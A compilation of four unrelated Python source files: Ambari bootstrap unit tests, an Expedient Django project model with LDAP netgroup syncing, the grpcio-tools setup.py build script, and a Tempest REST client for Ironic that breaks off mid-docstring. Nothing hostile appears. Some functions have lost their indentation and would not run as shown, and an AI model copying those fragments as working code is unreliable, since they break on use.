    try_to_execute_mock.side_effect = [{"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}, {"exitstatus": 1, "log":"log1", "errormsg":"errormsg1"}]
    bootstrap_obj.run()
    self.assertEqual(try_to_execute_mock.call_count, 2) # <- Adjust if changed
    self.assertTrue("ERROR" in error_mock.call_args[0][0])
    self.assertTrue("ERROR" in write_mock.call_args[0][0])
    self.assertTrue(createDoneFile_mock.called)
    self.assertEqual(bootstrap_obj.getStatus()["return_code"], 1)
    try_to_execute_mock.reset_mock()
    createDoneFile_mock.reset_mock()
    # Testing workflow when some action failed after copying password:
    # a third call (cleanup of the copied password file) still happens.
    bootstrap_obj.copied_password_file = True
    hasPassword_mock.return_value = True
    try_to_execute_mock.side_effect = [{"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}, {"exitstatus": 42, "log":"log42", "errormsg":"errormsg42"}, {"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}]
    bootstrap_obj.run()
    self.assertEqual(try_to_execute_mock.call_count, 3) # <- Adjust if changed
    self.assertTrue(createDoneFile_mock.called)
    self.assertEqual(bootstrap_obj.getStatus()["return_code"], 42)
    error_mock.reset_mock()
    write_mock.reset_mock()
    try_to_execute_mock.reset_mock()
    createDoneFile_mock.reset_mock()
    # Testing workflow when some action failed after copying password and
    # removing password failed too: the action failure is reported as ERROR,
    # the cleanup failure only as WARNING, and the action's exit status (17)
    # wins over the cleanup's (19).
    bootstrap_obj.copied_password_file = True
    hasPassword_mock.return_value = True
    try_to_execute_mock.side_effect = [{"exitstatus": 0, "log":"log0", "errormsg":"errormsg0"}, {"exitstatus": 17, "log":"log17", "errormsg":"errormsg17"}, {"exitstatus": 19, "log":"log19", "errormsg":"errormsg19"}]
    bootstrap_obj.run()
    self.assertEqual(try_to_execute_mock.call_count, 3) # <- Adjust if changed
    self.assertTrue("ERROR" in write_mock.call_args_list[0][0][0])
    self.assertTrue("ERROR" in error_mock.call_args[0][0])
    self.assertTrue("WARNING" in write_mock.call_args_list[1][0][0])
    self.assertTrue("WARNING" in warn_mock.call_args[0][0])
    self.assertTrue(createDoneFile_mock.called)
    self.assertEqual(bootstrap_obj.getStatus()["return_code"], 17)
@patch.object(BootstrapDefault, "createDoneFile")
@patch.object(HostLog, "write")
def test_interruptBootstrap(self, write_mock, createDoneFile_mock):
shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
"setupAgentFile", "ambariServer", "centos6",
None, "8440", "root")
bootstrap_obj = Bootstrap("hostname", shared_state)
bootstrap_obj.interruptBootstrap()
self.assertTrue(createDoneFile_mock.called)
  @patch("time.sleep")
  @patch("time.time")
  @patch("logging.warn")
  @patch("logging.info")
  @patch.object(BootstrapDefault, "start")
  @patch.object(BootstrapDefault, "interruptBootstrap")
  @patch.object(BootstrapDefault, "getStatus")
  def test_PBootstrap(self, getStatus_mock, interruptBootstrap_mock, start_mock,
                      info_mock, warn_mock, time_mock, sleep_mock):
    """PBootstrap.run() should start a bootstrap for every host and
    interrupt only those hosts whose bootstrap has exceeded
    bootstrap.HOST_BOOTSTRAP_TIMEOUT without finishing."""
    shared_state = SharedState("root", "123", "sshkey_file", "scriptDir", "bootdir",
                               "setupAgentFile", "ambariServer", "centos6",
                               None, "8440", "root")
    n = 180
    time = 100500
    time_mock.return_value = time
    hosts = []
    for i in range(0, n):
      hosts.append("host" + str(i))
    # Testing normal case: every host reports success and a start time in
    # the future, so nothing times out and nothing is interrupted.
    getStatus_mock.return_value = {"return_code": 0,
                                   "start_time": time + 999}
    pbootstrap_obj = PBootstrap(hosts, shared_state)
    pbootstrap_obj.run()
    self.assertEqual(start_mock.call_count, n)
    self.assertEqual(interruptBootstrap_mock.call_count, 0)
    start_mock.reset_mock()
    getStatus_mock.reset_mock()
    # Testing case of timeout. Status values come from Python 2 style
    # generators (.next()): every 5th host never finishes (return_code is
    # None) and every start time is already past the bootstrap timeout, so
    # exactly n/5 hosts should be interrupted.
    def fake_return_code_generator():
      call_number = 0
      while True:
        call_number += 1
        if call_number % 5 != 0: # ~80% of hosts finish successfully
          yield 0
        else:
          yield None
    def fake_start_time_generator():
      while True:
        yield time - bootstrap.HOST_BOOTSTRAP_TIMEOUT - 1
    return_code_generator = fake_return_code_generator()
    start_time_generator = fake_start_time_generator()
    # getStatus() returns a dict-like MagicMock whose item lookups are fed
    # from the generators above.
    def status_get_item_mock(item):
      if item == "return_code":
        return return_code_generator.next()
      elif item == "start_time":
        return start_time_generator.next()
    dict_mock = MagicMock()
    dict_mock.__getitem__.side_effect = status_get_item_mock
    getStatus_mock.return_value = dict_mock
    pbootstrap_obj.run()
    self.assertEqual(start_mock.call_count, n)
    self.assertEqual(interruptBootstrap_mock.call_count, n / 5)
| |
'''
@author: jnaous
'''
from django.db import models
from expedient.common.permissions.models import Permittee, ObjectPermission
from expedient.common.permissions.utils import permissions_save_override,\
permissions_delete_override
from expedient.clearinghouse.aggregate.models import Aggregate
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from expedient.clearinghouse.aggregate.utils import get_aggregate_classes
from expedient.common.ldapproxy.models import LdapProxy
from django.conf import settings
from django.db import transaction
import uuid
import string
import re
from expedient.common.utils.validators import asciiValidator, descriptionLightValidator
class ProjectManager(models.Manager):
    """Manager for L{Project} instances.

    Add methods to retrieve project querysets.
    """

    def get_for_user(self, user):
        """Return projects for which C{user} has some permission.

        @param user: The user whose projects we are looking for.
        @type user: C{User}.
        """
        # Superusers see everything; everybody else only sees projects on
        # which they hold at least one object permission.
        if user.is_superuser:
            return self.all()
        permittee = Permittee.objects.get_as_permittee(user)
        accessible_ids = ObjectPermission.objects.filter_for_class(
            klass=Project,
            permittees=permittee,
        ).values_list("object_id", flat=True)
        return self.filter(id__in=list(accessible_ids))
import logging
logger = logging.getLogger("Project.models")
class Project(models.Model):
    '''
    A project is a collection of users working on the same set of slices.

    @cvar objects: A L{ProjectManager} instance.

    @ivar name: The name of the project
    @type name: L{str}
    @ivar description: Short description of the project
    @type description: L{str}
    @ivar aggregates: Read-only property returning all aggregates that can
        be used by the project (i.e. for which the project has the
        "can_use_aggregate" permission).
    @type aggregates: C{QuerySet} of L{Aggregate}s
    @ivar researchers: Read-only property returning all users that have the
        'researcher' role for the project.
    @type researchers: C{QuerySet} of C{User}s.
    @ivar owners: Read-only property returning all users that have the 'owner'
        role for the project.
    @type owners: C{QuerySet} of C{User}s.
    @ivar members: Read-only property returning all users that have some
        permission in the project.
    @type members: C{QuerySet} of C{User}s.
    @ivar members_as_permittees: Read-only property returning all users
        that have some permission in the project as Permittee instances.
    @type members_as_permittees: C{QuerySet} of L{Permittee}s.
    '''
    objects = ProjectManager()

    # Project names are globally unique and restricted to ASCII characters.
    name = models.CharField(max_length=200, unique=True, validators=[asciiValidator])
    description = models.TextField(validators=[descriptionLightValidator])
    # Stable identifier used for the LDAP netgroup name and for VM
    # bookkeeping; not editable via forms. Presumably populated on creation
    # (the uuid module is imported at file top) -- TODO confirm.
    uuid = models.CharField(max_length=200, default = "", unique=True, editable =False)
    '''
    save = permissions_save_override(
        permittee_kw="user",
        model_func=lambda: Project,
        create_perm="can_create_project",
        edit_perm="can_edit_project",
        delete_perm="can_delete_project",
    )
    delete = permissions_delete_override(
        permittee_kw="user",
        model_func=lambda: Project,
        delete_perm="can_delete_project",
    )
    '''
    # originally, code was save = permissions_save_override (...)
    # in which super(model_func(), self).save(*args, **kwargs) is called
    # thus the save function of our parent class.
    #
    # the inner save function that is returned by permissions_save_override
    # calls must_have_permission, which raises a PermissionDenied when
    # saving is not allowed. ==> extending the save functionality does not
    # require checking whether action was allowed or not when this
    # exception is raised.
    def save(self, *args, **kwargs):
        """Save the project and, when configured, sync its LDAP netgroup."""
        # NOTE(review): permissions_save_override() returns the wrapped save
        # function, but the returned callable is discarded here and never
        # invoked, so it is not obvious that any permission check actually
        # runs before saving -- confirm against
        # expedient.common.permissions.utils.
        permissions_save_override(
            permittee_kw="user",
            model_func=lambda: Project,
            create_perm="can_create_project",
            edit_perm="can_edit_project",
            delete_perm="can_delete_project",
        )
        super(Project, self).save(*args, **kwargs)
        # Keep the LDAP netgroup in sync once the project has a uuid.
        if settings.LDAP_STORE_PROJECTS and self.uuid:
            self.sync_netgroup_ldap()

    def delete(self, *args, **kwargs):
        """Delete the project, refusing while it still owns VMs; also remove
        the project's LDAP netgroup when LDAP storage is enabled."""
        from vt_plugin.models.VM import VM
        if VM.objects.filter(projectId = self.uuid):
            raise Exception("Project still have VMs")
        # NOTE(review): as in save(), the wrapper returned by
        # permissions_delete_override() is discarded without being called --
        # confirm the permission check actually takes effect.
        permissions_delete_override(
            permittee_kw="user",
            model_func=lambda: Project,
            delete_perm="can_delete_project",
        )
        if settings.LDAP_STORE_PROJECTS:
            self.delete_netgroup_ldap()
        super(Project, self).delete(*args, **kwargs)

    def _get_aggregates(self):
        """Get all aggregates that can be used by the project
        (i.e. for which the project has the "can_use_aggregate" permission).
        """
        # Permissions are given to the leaf classes
        agg_ids = []
        agg_classes = get_aggregate_classes()
        permittee = Permittee.objects.get_as_permittee(self)
        for agg_class in agg_classes:
            agg_ids.extend(
                ObjectPermission.objects.filter_for_class(
                    agg_class,
                    permission__name="can_use_aggregate",
                    permittees=permittee,
                ).values_list("object_id", flat=True)
            )
        #TODO: marc commented this (the unfiltered alternative is kept below)
        return Aggregate.objects.filter(pk__in=agg_ids)
        #return Aggregate.objects
    aggregates=property(_get_aggregates)

    def _get_researchers(self):
        """Get all users who have the 'researcher' role for the project"""
        from expedient.clearinghouse.roles.models import ProjectRole
        return ProjectRole.objects.get_users_with_role('researcher', self)
    researchers=property(_get_researchers)

    def _get_owners(self):
        """Get all users who have the 'owner' role for the project"""
        from expedient.clearinghouse.roles.models import ProjectRole
        return ProjectRole.objects.get_users_with_role('owner', self)
    owners=property(_get_owners)

    def _get_members(self):
        """Get all users who have some permission in the project."""
        user_ids = self._get_permittees().values_list("object_id", flat=True)
        return User.objects.filter(pk__in=list(user_ids))
    members=property(_get_members)

    def _get_permittees(self):
        """Get all permittees that have some permission in the project."""
        return Permittee.objects.filter_for_class(User).filter(
            objectpermission__object_type=
                ContentType.objects.get_for_model(Project),
            objectpermission__object_id=self.id,
        ).distinct()
    members_as_permittees=property(_get_permittees)

    def _getSlices(self):
        """Return all slices belonging to this project (helper, not exposed
        as a property)."""
        from expedient.clearinghouse.slice.models import Slice
        return Slice.objects.filter(project=self)

    def __unicode__(self):
        s = u"Project %s" % self.name
        return s

    @classmethod
    @models.permalink
    def get_create_url(cls):
        "Returns the URL to create projects"
        return ("project_create",)

    @models.permalink
    def get_update_url(self):
        "Returns the URL to update project info"
        return ("project_update", (), {"proj_id": self.id})

    @models.permalink
    def get_detail_url(self):
        "Returns the URL for the project detail page"
        return ("project_detail", (), {"proj_id": self.id})

    @models.permalink
    def get_delete_url(self):
        "Returns the URL to delete a project"
        return ("project_delete", (), {"proj_id": self.id})

    @models.permalink
    def get_agg_add_url(self):
        "Returns the URL to add an aggregate to a project"
        return ("project_add_agg", (), {"proj_id": self.id})

    @models.permalink
    def get_agg_update_url(self, aggregate):
        "Returns URL to update an aggregate's info related to the project"
        return ("project_update_agg", (), {
            "proj_id": self.id,
            "agg_id": aggregate.id})

    @models.permalink
    def get_agg_remove_url(self, aggregate):
        "Returns URL to remove aggregate from project"
        return ("project_remove_agg", (), {
            "proj_id": self.id,
            "agg_id": aggregate.id})

    @models.permalink
    def get_member_add_url(self):
        "Returns the URL to add a member to the project"
        return ("project_member_add", (), {
            "proj_id": self.id})

    @models.permalink
    def get_member_update_url(self, user):
        "Returns the URL to update a member's roles in the project"
        return ("project_member_update", (), {
            "proj_id": self.id,
            "user_id": user.id})

    @models.permalink
    def get_member_remove_url(self, user):
        "Returns the URL to remove a member from the project"
        return ("project_member_remove", (), {
            "proj_id": self.id,
            "user_id": user.id})

    '''
    LDAP synchronization
    '''
    def get_netgroup(self):
        """Return the LDAP netgroup cn for this project:
        'proj_<uuid>_<name>' with spaces/tabs replaced by underscores."""
        # NOTE(review): `str` shadows the builtin, and string.replace() is
        # the deprecated Python 2 module-level function -- s.replace(...)
        # would be the modern equivalent.
        str = 'proj_%s_%s' % (self.uuid, self.name)
        str = string.replace(str,' ','_')
        str = string.replace(str,'\t','__')
        return str

    def get_netgroup_dn(self):
        """Return the full LDAP DN of this project's netgroup entry."""
        return 'cn=%s,%s' % (self.get_netgroup(), settings.LDAP_MASTER_USERNETGROUPS)

    def sync_netgroup_ldap (self):
        """Create or replace this project's nisNetgroup entry in LDAP with a
        nisNetgroupTriple for each qualifying member."""
        l = LdapProxy()
        dn = self.get_netgroup_dn()
        cn = self.get_netgroup().encode()
        data = {'objectClass': ['nisNetgroup', 'top'], 'cn': [cn], 'nisNetgroupTriple': []}
        for user in self._get_members():
            # Only members whose password hash is "!" are exported --
            # presumably accounts with local login disabled that
            # authenticate via LDAP; TODO confirm this convention.
            if user.password == "!":
                logger.debug("New member: "+str(user.username))
                data['nisNetgroupTriple'].append("(,%s,)" % str(user.username))
                logger.debug("sync_netgroup_ldap: member: %s" % str(user.username))
        l.create_or_replace (dn, data)

    def delete_netgroup_ldap(self):
        """Remove this project's netgroup entry from LDAP."""
        l = LdapProxy()
        dn = self.get_netgroup_dn()
        l.delete (dn)
| |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils import cygwinccompiler
from distutils import extension
from distutils import util
import errno
import os
import os.path
import platform
import re
import shlex
import shutil
import subprocess
from subprocess import PIPE
import sys
import sysconfig
import pkg_resources
import setuptools
from setuptools.command import build_ext
# TODO(atash) add flag to disable Cython use
_PACKAGE_PATH = os.path.realpath(os.path.dirname(__file__))
_README_PATH = os.path.join(_PACKAGE_PATH, 'README.rst')
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.abspath('.'))
import _parallel_compile_patch
import protoc_lib_deps
import grpc_version
# Name of the extension module's C init symbol; the naming convention
# differs between Python 2 and Python 3 extension modules.
_EXT_INIT_SYMBOL = ("init_protoc_compiler"
                    if sys.version_info[0] == 2 else "PyInit__protoc_compiler")

# Enable parallel compilation of C/C++ sources where supported.
_parallel_compile_patch.monkeypatch_compile_maybe()
# Trove classifiers advertised on PyPI for this package.
CLASSIFIERS = [
    'Development Status :: 5 - Production/Stable',
    'Programming Language :: Python',
    'Programming Language :: Python :: 3',
    'License :: OSI Approved :: Apache Software License',
]

# True when running under Python 3.
PY3 = sys.version_info.major == 3
def _env_bool_value(env_name, default):
"""Parses a bool option from an environment variable"""
return os.environ.get(env_name, default).upper() not in ['FALSE', '0', '']
# Environment variable to determine whether or not the Cython extension should
# *use* Cython or use the generated C files. Note that this requires the C files
# to have been generated by building first *with* Cython support.
BUILD_WITH_CYTHON = _env_bool_value('GRPC_PYTHON_BUILD_WITH_CYTHON', 'False')

# Export this variable to force building the python extension with a statically linked libstdc++.
# At least on linux, this is normally not needed as we can build manylinux-compatible wheels on linux just fine
# without statically linking libstdc++ (which leads to a slight increase in the wheel size).
# This option is useful when crosscompiling wheels for aarch64 where
# it's difficult to ensure that the crosscompilation toolchain has a high-enough version
# of GCC (we require >4.9) but still uses old-enough libstdc++ symbols.
# TODO(jtattermusch): remove this workaround once issues with crosscompiler version are resolved.
BUILD_WITH_STATIC_LIBSTDCXX = _env_bool_value(
    'GRPC_PYTHON_BUILD_WITH_STATIC_LIBSTDCXX', 'False')
def check_linker_need_libatomic():
    """Test if linker on system needs libatomic.

    Returns True only when a std::atomic probe program fails to link on its
    own but succeeds with -latomic.
    """
    probe_source = (b'#include <atomic>\n' +
                    b'int main() { return std::atomic<int64_t>{}; }')
    compiler = os.environ.get('CXX', 'c++')

    def _probe_links(extra_args):
        # Feed the probe program to the compiler via stdin and check whether
        # compiling + linking succeeds.
        proc = subprocess.Popen(
            [compiler, '-x', 'c++', '-std=c++11', '-'] + extra_args,
            stdin=PIPE,
            stdout=PIPE,
            stderr=PIPE)
        proc.communicate(input=probe_source)
        return proc.returncode == 0

    if _probe_links([]):
        return False
    # Double-check to see if -latomic actually can solve the problem.
    # https://github.com/grpc/grpc/issues/22491
    return _probe_links(['-latomic'])
class BuildExt(build_ext.build_ext):
    """Custom build_ext command."""

    def get_ext_filename(self, ext_name):
        # Since python3.5, extension shared libraries carry the value of
        # sysconfig.get_config_var('EXT_SUFFIX') in their file name, which
        # encodes the targeted architecture (e.g.
        # ".cpython-XYZ-x86_64-linux-gnu.so" on x64 linux). When
        # crosscompiling wheels we need to override that suffix so the file
        # name matches the target architecture and the wheel is well-formed.
        default_name = build_ext.build_ext.get_ext_filename(self, ext_name)
        configured_suffix = sysconfig.get_config_var('EXT_SUFFIX')
        override_suffix = os.getenv('GRPC_PYTHON_OVERRIDE_EXT_SUFFIX')
        if not override_suffix or not default_name.endswith(configured_suffix):
            return default_name
        return default_name[:-len(configured_suffix)] + override_suffix
# There are some situations (like on Windows) where CC, CFLAGS, and LDFLAGS are
# entirely ignored/dropped/forgotten by distutils and its Cygwin/MinGW support.
# We use these environment variables to thus get around that without locking
# ourselves in w.r.t. the multitude of operating systems this ought to build on.
# We can also use these variables as a way to inject environment-specific
# compiler/linker flags. We assume GCC-like compilers and/or MinGW as a
# reasonable default.
EXTRA_ENV_COMPILE_ARGS = os.environ.get('GRPC_PYTHON_CFLAGS', None)
EXTRA_ENV_LINK_ARGS = os.environ.get('GRPC_PYTHON_LDFLAGS', None)
# Platform-specific defaults are applied only when the envvar is unset, so
# the user-supplied flags always win wholesale.
if EXTRA_ENV_COMPILE_ARGS is None:
    EXTRA_ENV_COMPILE_ARGS = '-std=c++11'
    if 'win32' in sys.platform:
        if sys.version_info < (3, 5):
            # We use define flags here and don't directly add to DEFINE_MACROS below to
            # ensure that the expert user/builder has a way of turning it off (via the
            # envvars) without adding yet more GRPC-specific envvars.
            # See https://sourceforge.net/p/mingw-w64/bugs/363/
            if '32' in platform.architecture()[0]:
                EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime32 -D_timeb=__timeb32 -D_ftime_s=_ftime32_s -D_hypot=hypot'
            else:
                EXTRA_ENV_COMPILE_ARGS += ' -D_ftime=_ftime64 -D_timeb=__timeb64 -D_hypot=hypot'
        else:
            # We need to statically link the C++ Runtime, only the C runtime is
            # available dynamically
            EXTRA_ENV_COMPILE_ARGS += ' /MT'
    elif "linux" in sys.platform or "darwin" in sys.platform:
        EXTRA_ENV_COMPILE_ARGS += ' -fno-wrapv -frtti'
if EXTRA_ENV_LINK_ARGS is None:
    EXTRA_ENV_LINK_ARGS = ''
    # NOTE(rbellevi): Clang on Mac OS will make all static symbols (both
    # variables and objects) global weak symbols. When a process loads the
    # protobuf wheel's shared object library before loading *this* C extension,
    # the runtime linker will prefer the protobuf module's version of symbols.
    # This results in the process using a mixture of symbols from the protobuf
    # wheel and this wheel, which may be using different versions of
    # libprotobuf. In the case that they *are* using different versions of
    # libprotobuf *and* there has been a change in data layout (or in other
    # invariants) segfaults, data corruption, or "bad things" may happen.
    #
    # This flag ensures that on Mac, the only global symbol is the one loaded by
    # the Python interpreter. The problematic global weak symbols become local
    # weak symbols. This is not required on Linux since the compiler does not
    # produce global weak symbols. This is not required on Windows as our ".pyd"
    # file does not contain any symbols.
    #
    # Finally, the leading underscore here is part of the Mach-O ABI. Unlike
    # more modern ABIs (ELF et al.), Mach-O prepends an underscore to the names
    # of C functions.
    if "darwin" in sys.platform:
        EXTRA_ENV_LINK_ARGS += ' -Wl,-exported_symbol,_{}'.format(
            _EXT_INIT_SYMBOL)
    if "linux" in sys.platform or "darwin" in sys.platform:
        EXTRA_ENV_LINK_ARGS += ' -lpthread'
        if check_linker_need_libatomic():
            EXTRA_ENV_LINK_ARGS += ' -latomic'
    elif "win32" in sys.platform and sys.version_info < (3, 5):
        # NOTE(review): get_msvcr() is assumed to return a non-empty list on
        # this platform/toolchain — [0] raises IndexError otherwise; confirm.
        msvcr = cygwinccompiler.get_msvcr()[0]
        EXTRA_ENV_LINK_ARGS += (
            ' -static-libgcc -static-libstdc++ -mcrtdll={msvcr}'
            ' -static -lshlwapi'.format(msvcr=msvcr))
EXTRA_COMPILE_ARGS = shlex.split(EXTRA_ENV_COMPILE_ARGS)
EXTRA_LINK_ARGS = shlex.split(EXTRA_ENV_LINK_ARGS)
if BUILD_WITH_STATIC_LIBSTDCXX:
    EXTRA_LINK_ARGS.append('-static-libstdc++')
# Normalize the dependency paths exported by protoc_lib_deps for this OS.
CC_FILES = [os.path.normpath(cc_file) for cc_file in protoc_lib_deps.CC_FILES]
PROTO_FILES = [
    os.path.normpath(proto_file) for proto_file in protoc_lib_deps.PROTO_FILES
]
CC_INCLUDE = os.path.normpath(protoc_lib_deps.CC_INCLUDE)
PROTO_INCLUDE = os.path.normpath(protoc_lib_deps.PROTO_INCLUDE)
GRPC_PYTHON_TOOLS_PACKAGE = 'grpc_tools'
GRPC_PYTHON_PROTO_RESOURCES_NAME = '_proto'
DEFINE_MACROS = ()
if "win32" in sys.platform:
    DEFINE_MACROS += (('WIN32_LEAN_AND_MEAN', 1),)
    if '64bit' in platform.architecture()[0]:
        DEFINE_MACROS += (('MS_WIN64', 1),)
elif "linux" in sys.platform or "darwin" in sys.platform:
    DEFINE_MACROS += (('HAVE_PTHREAD', 1),)
# By default, Python3 distutils enforces compatibility of
# c plugins (.so files) with the OSX version Python was built with.
# We need OSX 10.10, the oldest which supports C++ thread_local.
if 'darwin' in sys.platform:
    mac_target = sysconfig.get_config_var('MACOSX_DEPLOYMENT_TARGET')
    if mac_target and (pkg_resources.parse_version(mac_target) <
                       pkg_resources.parse_version('10.10.0')):
        os.environ['MACOSX_DEPLOYMENT_TARGET'] = '10.10'
        os.environ['_PYTHON_HOST_PLATFORM'] = re.sub(
            r'macosx-[0-9]+\.[0-9]+-(.+)', r'macosx-10.10-\1',
            util.get_platform())
def package_data():
    """Copy the bundled .proto files into the package tree and list them.

    Each file from PROTO_FILES is copied from PROTO_INCLUDE into the
    '_proto' resource directory inside the grpc_tools package so it ships
    with the wheel.

    :returns: dict mapping the tools package name to the list of proto file
        paths (relative to the package) to register as package_data.
    """
    tools_path = GRPC_PYTHON_TOOLS_PACKAGE.replace('.', os.path.sep)
    proto_resources_path = os.path.join(tools_path,
                                        GRPC_PYTHON_PROTO_RESOURCES_NAME)
    proto_files = []
    for proto_file in PROTO_FILES:
        source = os.path.join(PROTO_INCLUDE, proto_file)
        target = os.path.join(proto_resources_path, proto_file)
        relative_target = os.path.join(GRPC_PYTHON_PROTO_RESOURCES_NAME,
                                       proto_file)
        # exist_ok replaces the old Python-2-era errno.EEXIST dance (the file
        # already requires python>=3.6); other OSErrors still propagate.
        os.makedirs(os.path.dirname(target), exist_ok=True)
        shutil.copy(source, target)
        proto_files.append(relative_target)
    return {GRPC_PYTHON_TOOLS_PACKAGE: proto_files}
def extension_modules():
    """Build the list of setuptools Extension objects for grpcio-tools.

    Uses the Cython .pyx source when BUILD_WITH_CYTHON is set, otherwise the
    pre-generated .cpp file that must have been produced by a prior
    Cython-enabled build.
    """
    if BUILD_WITH_CYTHON:
        plugin_sources = [os.path.join('grpc_tools', '_protoc_compiler.pyx')]
    else:
        plugin_sources = [os.path.join('grpc_tools', '_protoc_compiler.cpp')]
    # The protoc front-end, the gRPC python plugin generator, and the bundled
    # protobuf sources are all compiled into a single extension module.
    plugin_sources += [
        os.path.join('grpc_tools', 'main.cc'),
        os.path.join('grpc_root', 'src', 'compiler', 'python_generator.cc')
    ] + [os.path.join(CC_INCLUDE, cc_file) for cc_file in CC_FILES]
    plugin_ext = extension.Extension(
        name='grpc_tools._protoc_compiler',
        sources=plugin_sources,
        include_dirs=[
            '.',
            'grpc_root',
            os.path.join('grpc_root', 'include'),
            CC_INCLUDE,
        ],
        language='c++',
        define_macros=list(DEFINE_MACROS),
        extra_compile_args=list(EXTRA_COMPILE_ARGS),
        extra_link_args=list(EXTRA_LINK_ARGS),
    )
    extensions = [plugin_ext]
    if BUILD_WITH_CYTHON:
        # Imported lazily so non-Cython builds don't require Cython at all.
        from Cython import Build
        return Build.cythonize(extensions)
    else:
        return extensions
# Entry point: declare the grpcio-tools distribution.  ext_modules and
# package_data are computed above at import time (the protos are copied into
# the package tree as a side effect of package_data()).
setuptools.setup(name='grpcio-tools',
                 version=grpc_version.VERSION,
                 description='Protobuf code generator for gRPC',
                 long_description=open(_README_PATH, 'r').read(),
                 author='The gRPC Authors',
                 author_email='grpc-io@googlegroups.com',
                 url='https://grpc.io',
                 license='Apache License 2.0',
                 classifiers=CLASSIFIERS,
                 ext_modules=extension_modules(),
                 packages=setuptools.find_packages('.'),
                 python_requires='>=3.6',
                 install_requires=[
                     'protobuf>=3.5.0.post1, < 4.0dev',
                     'grpcio>={version}'.format(version=grpc_version.VERSION),
                     'setuptools',
                 ],
                 package_data=package_data(),
                 cmdclass={
                     'build_ext': BuildExt,
                 })
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_serialization import jsonutils as json
import six
from six.moves.urllib import parse as urllib
from tempest.lib.common import rest_client
def handle_errors(f):
    """A decorator that allows to ignore certain types of errors.

    The wrapped callable accepts an extra keyword argument
    ``ignore_errors`` (a tuple of exception classes); those exceptions are
    silently swallowed and the wrapper returns None in that case.
    """

    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        # Pull the optional tuple of exception classes out of the call so
        # it is never forwarded to the wrapped function.
        ignored_errors = kwargs.pop('ignore_errors', ())
        try:
            return f(*args, **kwargs)
        except ignored_errors:
            # Silently ignore the configured error types.
            pass

    return wrapper
class BaremetalClient(rest_client.RestClient):
    """Base Tempest REST client for Ironic API."""

    # URI prefix (e.g. an API version segment) prepended to non-permanent
    # URIs; subclasses override this.
    uri_prefix = ''

    def serialize(self, object_dict):
        """Serialize an Ironic object (dict) to a JSON string."""
        return json.dumps(object_dict)

    def deserialize(self, object_str):
        """Deserialize a JSON string into an Ironic object (dict)."""
        return json.loads(object_str)

    def _get_uri(self, resource_name, uuid=None, permanent=False):
        """Get URI for a specific resource or object.

        :param resource_name: The name of the REST resource, e.g., 'nodes'.
        :param uuid: The unique identifier of an object in UUID format.
        :param permanent: When True, skip ``uri_prefix`` (used for version
            discovery endpoints).
        :returns: Relative URI for the resource or object.
        """
        prefix = self.uri_prefix if not permanent else ''
        return '{pref}/{res}{uuid}'.format(pref=prefix,
                                           res=resource_name,
                                           uuid='/%s' % uuid if uuid else '')

    def _make_patch(self, allowed_attributes, **kwargs):
        """Create a JSON patch according to RFC 6902.

        :param allowed_attributes: An iterable object that contains a set of
            allowed attributes for an object.
        :param **kwargs: Attributes and new values for them.
        :returns: A JSON patch that sets values of the specified attributes to
            the new ones.
        """

        def get_change(kwargs, path='/'):
            # Walk nested dicts depth-first, emitting one patch op per leaf:
            # None means "remove the attribute", anything else "replace" it.
            for name, value in six.iteritems(kwargs):
                if isinstance(value, dict):
                    for ch in get_change(value, path + '%s/' % name):
                        yield ch
                else:
                    if value is None:
                        yield {'path': path + name,
                               'op': 'remove'}
                    else:
                        yield {'path': path + name,
                               'value': value,
                               'op': 'replace'}

        # Drop any ops touching attributes outside the allowed set.
        patch = [ch for ch in get_change(kwargs)
                 if ch['path'].lstrip('/') in allowed_attributes]
        return patch

    def _list_request(self, resource, permanent=False, **kwargs):
        """Get the list of objects of the specified type.

        :param resource: The name of the REST resource, e.g., 'nodes'.
        :param **kwargs: Parameters for the request (URL-encoded as the query
            string).
        :returns: A tuple with the server response and deserialized JSON list
            of objects
        """
        uri = self._get_uri(resource, permanent=permanent)
        if kwargs:
            uri += "?%s" % urllib.urlencode(kwargs)
        resp, body = self.get(uri)
        self.expected_success(200, resp.status)
        return resp, self.deserialize(body)

    def _show_request(self, resource, uuid, permanent=False, **kwargs):
        """Gets a specific object of the specified type.

        :param uuid: Unique identifier of the object in UUID format.
        :returns: Serialized object as a dictionary.
        """
        # An explicit 'uri' kwarg overrides the computed resource URI.
        if 'uri' in kwargs:
            uri = kwargs['uri']
        else:
            uri = self._get_uri(resource, uuid=uuid, permanent=permanent)
        resp, body = self.get(uri)
        self.expected_success(200, resp.status)
        return resp, self.deserialize(body)

    def _create_request(self, resource, object_dict):
        """Create an object of the specified type.

        :param resource: The name of the REST resource, e.g., 'nodes'.
        :param object_dict: A Python dict that represents an object of the
            specified type.
        :returns: A tuple with the server response and the deserialized created
            object.
        """
        body = self.serialize(object_dict)
        uri = self._get_uri(resource)
        resp, body = self.post(uri, body=body)
        self.expected_success(201, resp.status)
        return resp, self.deserialize(body)

    def _delete_request(self, resource, uuid):
        """Delete specified object.

        :param resource: The name of the REST resource, e.g., 'nodes'.
        :param uuid: The unique identifier of an object in UUID format.
        :returns: A tuple with the server response and the response body.
        """
        uri = self._get_uri(resource, uuid)
        resp, body = self.delete(uri)
        self.expected_success(204, resp.status)
        return resp, body

    def _patch_request(self, resource, uuid, patch_object):
        """Update specified object with JSON-patch.

        :param resource: The name of the REST resource, e.g., 'nodes'.
        :param uuid: The unique identifier of an object in UUID format.
